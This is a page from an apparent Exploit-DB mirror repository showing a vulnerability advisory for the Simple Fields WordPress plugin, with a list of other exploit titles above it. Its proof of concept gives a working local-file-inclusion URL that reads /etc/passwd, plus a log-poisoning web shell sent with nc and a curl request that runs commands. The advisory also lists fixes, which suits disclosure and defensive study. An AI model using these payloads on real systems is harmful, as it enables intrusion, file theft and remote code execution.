bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/44425.txt
Offensive Security c91cad5a90 DB: 2018-04-10 
19 changes to exploits/shellcodes

WebKit - WebAssembly Parsing Does not Correctly Check Section Order
CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure
H2 Database - 'Alias' Arbitrary Code Execution
GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)
PMS 0.42 - Local Stack-Based Overflow (ROP)

Unitrends UEB 10.0 - Unauthenticated Root Remote Code Execution
WolfCMS 0.8.3.1 - Cross Site Request Forgery
Cobub Razor 0.7.2 - Add New Superuser Account
MyBB Plugin Recent Threads On Index - Cross-Site Scripting
WolfCMS 0.8.3.1 - Open Redirection
Yahei PHP Prober 0.4.7 - Cross-Site Scripting
WordPress Plugin Simple Fields 0.2 - 0.3.5 - Local/Remote File Inclusion / Remote Code Execution
CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution
KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection
KYOCERA Net Admin 3.4 - Cross Site Request Forgery - Add Admin Exploit
Buddypress Xprofile Custom Fields Type 2.6.3  - Remote Code Execution
WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution
iScripts SonicBB 1.0 - Reflected Cross-Site Scripting
WordPress Plugin Google Drive 2.2 - Remote Code Execution
2018-04-10 05:01:53 +00:00

42 lines
No EOL
1.8 KiB
Text
Raw Blame History

# Exploit Title: Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE
# Date: 2018-04-08
# Exploit Author: Graeme Robinson
# Contact: @Grasec
# Vendor Homepage: http://simple-fields.com
# Software Link: https://downloads.wordpress.org/plugin/simple-fields.0.3.5.zip
# Version: 0.2 - 0.3.5
# Tested on: Ubuntu 16.04.4 + PHP 5.3.0
# Category: webapps
1. Description
Versions 0.2 to 0.3.5 of the Simple Fields WordPress plugin are vulnerable to local file inclusion if running on PHP <5.3.4. This can even lead to remote code execution, for example by injecting php code into the apache logs or if allow_url_include is turned on in php.ini.
PHP <5.3.4 is required because the exploit relies on the ability to inject a null byte to terminate a string before the script expects it to be and this was fixed in PHP 5.3.4
The vulnerability was fixed (commented out) in version 0.3.6 on 2011-02-03. Simple Fields is no longer actively developed, since 2016-02-27 (http://simple-fields.com/2016/bye-bye-simple-fields/)
The vulnerable line of code in simple_fields.php is:
require( $_GET["wp_abspath"] . './wp-blog-header.php' );
2. Proof of concept
LFI:
http://host/wordpress/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00
RCE:
$ echo "<?system(\$_GET['cmd'])?>"|nc host 80
$ curl "http://host/wordpress/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=../../../../../logs/access_log%00&cmd=id"
3. Solutions:
* Upgrade PHP to 5.3.4+
* Update Simple Fields to 0.3.6+
* Stop using Simple Fields because it is no longer supported
4. Relevant Links:
* http://simple-fields.com
* https://wordpress.org/plugins/simple-fields/
* https://downloads.wordpress.org/plugin/simple-fields.0.3.5.zip
* https://github.com/bonny/WordPress-Simple-Fields
Reference in a new issue View git blame Copy permalink